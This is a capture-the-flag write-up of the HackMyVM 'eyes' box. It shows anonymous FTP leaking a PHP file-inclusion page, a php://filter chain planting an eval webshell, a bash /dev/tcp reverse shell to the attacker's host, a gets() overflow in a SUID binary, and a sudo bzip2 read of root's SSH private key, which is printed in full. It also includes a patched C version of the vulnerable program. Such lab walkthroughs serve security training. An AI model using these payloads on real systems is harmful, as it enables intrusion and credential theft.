hack-my-vm-eyes

Port scan

kali@kali [~] ➜  sudo nmap -sT -p- --min-rate 1000 172.20.10.2                                                                                   [17:07:39]
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-13 17:16 CST
Nmap scan report for 172.20.10.2
Host is up (0.0015s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:23:25:0E (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 3.97 seconds

Service and version detection

kali@kali [~] ➜  sudo nmap -sT -sV -sC -p21,22,80 -O 172.20.10.2                                                                                 [17:16:12]
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-13 17:16 CST
Nmap scan report for 172.20.10.2
Host is up (0.00048s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:172.20.10.5
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 125 Apr 04 2021 index.php
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 b1:12:94:12:60:67:e1:0b:45:c1:8d:e9:21:13:bc:51 (RSA)
| 256 b7:7f:25:94:d6:4e:88:56:8a:22:34:16:c2:de:ba:02 (ECDSA)
|_ 256 30:c7:a2:90:39:5d:24:13:bf:aa:ba:4c:a7:f4:2f:bb (ED25519)
80/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 08:00:27:23:25:0E (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5
OS details: Linux 5.0 - 5.5
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.45 seconds

We can see that this FTP server allows anonymous login.

Service exploitation

kali@kali [~] ➜  ftp 172.20.10.2                                                                                                                 [17:16:59]
Connected to 172.20.10.2.
220 (vsFTPd 3.0.3)
Name (172.20.10.2:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||48514|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 125 Apr 04 2021 index.php
226 Directory send OK.
ftp> put x
local: x remote: x
229 Entering Extended Passive Mode (|||7627|)
550 Permission denied.
ftp>

Uploads are not allowed, so all we can do is download the file and take a look.

kali@kali [~/web_shell_toos] ➜  cat index.php                                                                                                    [17:18:55]
<?php
$file = $_GET['fil3'];
if(isset($file))
{
include($file);
}
else
{
print("Here my eyes...");
}
?>
<!--Monica's eyes-->

This is a textbook file inclusion: the fil3 parameter goes straight into include() with no check. Log poisoning would work too, but here a php://filter chain gets it done instantly.

kali@kali [~/web_shell_toos/php_filter_chain_generator] git:(main) ➜  python3 php_filter_chain_generator.py --chain '<?php eval($_POST["x"]);?>' [17:20:34]
[+] The following gadget chain will generate the following code : <?php eval($_POST["x"]);?> (base64 value: PD9waHAgZXZhbCgkX1BPU1RbIngiXSk7Pz4)
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP866.CSUNICODE|convert.iconv.CSISOLATIN5.ISO_6937-2|convert.iconv.CP950.UTF-16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.iconv.ISO-IR-103.850|convert.iconv.PT154.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.SJIS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.DEC.UTF-16|convert.iconv.ISO8859-9.ISO_6937-2|convert.iconv.UTF16.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO88594.UTF16|convert.iconv.IBM5347.UCS4|convert.iconv.UTF32BE.MS936|convert.iconv.OSF00010004.T.61|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.BIG5.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.I
BM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO88597.UTF16|convert.iconv.RK1048.UCS-4LE|convert.iconv.UTF32.CP1167|convert.iconv.CP9066.CSUCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO88597.UTF16|convert.iconv.RK1048.UCS-4LE|convert.iconv.UTF32.CP1167|convert.iconv.CP9066.CSUCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.bas
e64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp

Next, get a reverse shell straight away.

/bin/bash -c 'exec bash -i &>/dev/tcp/172.20.10.5/8888 <&1'

x=system("%2fbin%2fbash+-c+%27exec+bash+-i+%26%3e%2fdev%2ftcp%2f172.20.10.5%2f8888+%3c%261%27");

We get a shell as www-data.

kali@kali [~] ➜  nc -lvnp 8888                                                                                                                   [17:24:28]
listening on [any] 8888 ...
connect to [172.20.10.5] from (UNKNOWN) [172.20.10.2] 54906
bash: cannot set terminal process group (328): Inappropriate ioctl for device
bash: no job control in this shell
www-data@eyes:~/html$

Privilege escalation

www-data@eyes:~/html$ sudo -l
sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.

sudo: no tty present and no askpass program specified
www-data@eyes:~/html$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/opt/ls
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/su
/usr/bin/mount
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/umount
/usr/bin/chsh
www-data@eyes:~/html$

There is an ls binary in /opt with the SUID bit set.

www-data@eyes:/opt$ ls -la
ls -la
total 36
drwxr-xr-x 2 root root 4096 Apr 4 2021 .
drwxr-xr-x 18 root root 4096 Apr 4 2021 ..
-rwsr-sr-x 1 root root 16864 Apr 4 2021 ls
-rw-r--r-- 1 root root 349 Apr 4 2021 ls.c
-rw-r--r-- 1 monica monica 41 Apr 4 2021 note.txt
www-data@eyes:/opt$ cat ls.c
cat ls.c
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>

int main(void)
{
char command[100];
char ls[50]="/usr/bin/ls";
char name[50];
printf("Enter your name:");
gets(name);
strcpy(command,ls);
setuid(1000);
setgid(1000);
printf("Hi %s, Im executing ls\n Output:\n",name);
system(command);
}
www-data@eyes:/opt$

An overflow at a glance: because gets() is used, there is no limit on the length of the name we enter, so in theory we can write past the end of name and overwrite the contents of the ls array that system() later executes. We don't know the exact offset, but name is a 50-byte array, so we start trying with 60 bytes.

www-data@eyes:/opt$ ./ls
./ls
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ls
ls.c
note.txt
Enter your name:Hi AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA, Im executing ls
Output:
www-data@eyes:/opt$

That still works fine; let's try 70.

www-data@eyes:/opt$ ./ls
./ls
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
sh: 1: AAAAAA: not found
Enter your name:Hi AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA, Im executing ls
Output:
www-data@eyes:/opt$

It reports "AAAAAA: not found": the last six of our 70 A's landed at the start of ls, so name occupies 64 bytes before ls begins and 64 bytes of padding is all we need to overflow into it.

www-data@eyes:/opt$ ./ls
./ls
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAbash
whoami
monica
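As an added example (not code from the writeup or from the HackMyVM box), this is how the /opt/ls program above looks with the overflow closed: gets() is replaced by fgets() plus a bounded copy, the privilege drop is done in the right order with its return values checked, and ls is run by absolute path with execv() instead of system(), so nothing the user types can ever become a command. The function names read_name_bounded(), stored_name_length(), neighbour_survives() and run_ls_as() are my own; neighbour_survives() places two 50-byte arrays side by side as a constructed stand-in for the original stack layout (the real binary's 64-byte offset includes compiler padding) and reports whether a long name still reaches the second array.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define NAME_LEN 50   /* same buffer size as the original ls.c */

/* Copy one line of input into dst (capacity n) without ever writing past
 * dst. Strips the trailing newline. Returns 1 if the input had to be
 * truncated, 0 if it fit, -1 on NULL input or zero capacity. This is the
 * replacement for gets(), which has no bound at all and is what lets a
 * 64+ byte name run into the neighbouring 'ls' array in the original. */
int read_name_bounded(const char *line, char *dst, size_t n)
{
    if (line == NULL || n == 0)
        return -1;
    size_t len = strcspn(line, "\n");   /* bytes up to the newline */
    int truncated = 0;
    if (len >= n) {
        len = n - 1;
        truncated = 1;
    }
    memcpy(dst, line, len);
    dst[len] = '\0';
    return truncated;
}

/* Length of the name actually stored after a bounded read, or -1. */
int stored_name_length(const char *line)
{
    char name[NAME_LEN];
    if (read_name_bounded(line, name, sizeof name) < 0)
        return -1;
    return (int)strlen(name);
}

/* Self-check with a constructed layout that mirrors the vulnerable program:
 * a 50-byte name array directly followed by a 50-byte command array. Feeds
 * input_len 'A's through read_name_bounded() and returns 1 if the command
 * array still holds "/usr/bin/ls" afterwards, -1 if input_len is too large
 * for the scratch buffer. */
int neighbour_survives(size_t input_len)
{
    struct { char name[NAME_LEN]; char ls[NAME_LEN]; } frame;
    char input[512];
    if (input_len >= sizeof input - 1)
        return -1;
    memset(input, 'A', input_len);
    input[input_len] = '\n';
    input[input_len + 1] = '\0';
    memset(&frame, 0, sizeof frame);
    strcpy(frame.ls, "/usr/bin/ls");
    read_name_bounded(input, frame.name, sizeof frame.name);
    return strcmp(frame.ls, "/usr/bin/ls") == 0;
}

/* Drop privileges (group first, then user, both checked) and exec ls by
 * absolute path. No shell is involved, so user input can never be parsed
 * as a command. Returns -1 only if the drop or the exec failed. */
int run_ls_as(uid_t uid, gid_t gid)
{
    if (setgid(gid) != 0)
        return -1;
    if (setuid(uid) != 0)
        return -1;
    char *const argv[] = { "/usr/bin/ls", NULL };
    execv("/usr/bin/ls", argv);
    return -1;   /* only reached when execv() fails */
}

int main(void)
{
    char line[256];
    char name[NAME_LEN];
    printf("Enter your name:");
    fflush(stdout);
    if (fgets(line, sizeof line, stdin) == NULL)
        return 1;
    if (read_name_bounded(line, name, sizeof name) == 1)
        fprintf(stderr, "(name truncated to %d characters)\n", NAME_LEN - 1);
    printf("Hi %s, Im executing ls\n Output:\n", name);
    fflush(stdout);
    return run_ls_as(1000, 1000) == 0 ? 0 : 1;
}
```

Compile with `gcc -Wall -o ls_fixed ls_fixed.c`; feeding it the same 70-character name the writeup uses prints a truncation notice and a normal directory listing, because the command array is never reachable from the input.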

We have a shell, but only as a regular user; now try for root.

sudo -l
Matching Defaults entries for monica on eyes:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User monica may run the following commands on eyes:
(ALL) NOPASSWD: /usr/bin/bzip2
sudo /usr/bin/bzip2 -c /root/.ssh/id_rsa | /usr/bin/bzip2 -d
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEArFKlwNcXIsZLyj2E4waArCaGEOYVJxX50k4mF81nzPtiIgX+32e9
sMfZd6oDpovRq2hEE8TKqdfHogyvpVHV2wBs/BLOAajO63GnFX8dAoBi/yzhnyYXgrNE9b
Cs5D6itQVBxC1EINy1TS67T14+jqK+9UNWdfQC8VlENBeaVbYI3vUSxQCbRqs92nQLrSVM
hYOa0zhYdWlkCH46aprZi1OTe4ZvSfuzYU3+tmhonwiYMyeAYCSEsnkCeUTF4zke9kRovP
upbKiPWoYHEKXPWYCDJ9xOD/K1yMsK8YJ2rOqyr5TkyO5HdEGZxj8MFMTFLyeyFG2kUHYy
llW2WQoqZQAAA8DTPxkj0z8ZIwAAAAdzc2gtcnNhAAABAQCsUqXA1xcixkvKPYTjBoCsJo
YQ5hUnFfnSTiYXzWfM+2IiBf7fZ72wx9l3qgOmi9GraEQTxMqp18eiDK+lUdXbAGz8Es4B
qM7rcacVfx0CgGL/LOGfJheCs0T1sKzkPqK1BUHELUQg3LVNLrtPXj6Oor71Q1Z19ALxWU
Q0F5pVtgje9RLFAJtGqz3adAutJUyFg5rTOFh1aWQIfjpqmtmLU5N7hm9J+7NhTf62aGif
CJgzJ4BgJISyeQJ5RMXjOR72RGi8+6lsqI9ahgcQpc9ZgIMn3E4P8rXIywrxgnas6rKvlO
TI7kd0QZnGPwwUxMUvJ7IUbaRQdjKWVbZZCiplAAAAAwEAAQAAAQEAgq5ajReQsAp5R3HH
6PLxeZvtZ7tUp0N/JQGm2b4nzceF8A9j7cAalom4XYtNIWw/ISH9HpDKsGq3NikwusqIx4
BXJgKMv61o3hxefWrccR0z9hfvMmYMxk11Km1FcAIgGe9WpJM/azx1MYcS/WmXP0wkTJM4
alMWODleA7Myk3QuG/jwVEZE37xaJHPwTpv9VRbqIjqw9XQbGvArzyuAsGWtMMMpZ3zwx5
LuthcWa2B0u4ND+KCi6vk/phwtoHJL26FiCFHdNUda7UgssdBQ0jby/0wdHK4BvwooZS6v
23Ly1Lw37prz8GN8S504Xa5zKG0St1Xb+rT77lRDOsfTgQAAAIEAjbYIgPvhTt3ZS+ne8R
iDgwrIOZIKCwb+s5o5F0vH0c/++s+weAghl+Fn8QfgCAMHapEZmyKjvLbixUT2B8F765S4
6omR8PD3i0Rr0j+pbBz9jNga/+XJjctLF+atU3aG0tB1Nc5Z/+eGtHjL1UJPNRaHtyb3zt
gOvMAN/5ZR8sMAAACBANl6TrhqiJaQcOdOT05Y4FxSh4r4ng2TTd5k1B9d2lSIVKeviKtj
L4QDlT/uzE6Rf0bNgunP+qT5YjB4ag/17sm7GDzSd+8MDnkeRTDEtHjPwLEHUYDyNl0/wS
9B+rlHu84WMYexmltA30PjAUQXaztYcKortlBHF8PRqHcatJaJAAAAgQDK2MGRmyabimXN
Ursppl+JsMn/xvaUj6AvlTmdyH7rGmjwa4s9OP503AX59/pRyyhGOuPyaiWR8kNp5YOkH0
Zv8bGSSWUP3b7ScjgCMVaXXVmEgG+feZyf1swM2WwQVZzs152wZcrK3hFG/vIFlFwcDD3y
pN2NMCkY0EFGqmz9/QAAAAlyb290QGV5ZXM=
-----END OPENSSH PRIVATE KEY-----

Since bzip2 runs as root with NOPASSWD and -c writes the compressed data to stdout, piping it through bzip2 -d yields the plaintext of any file root can read. We could read the flag directly this way; here we read root's private key instead, which lets us log in with it.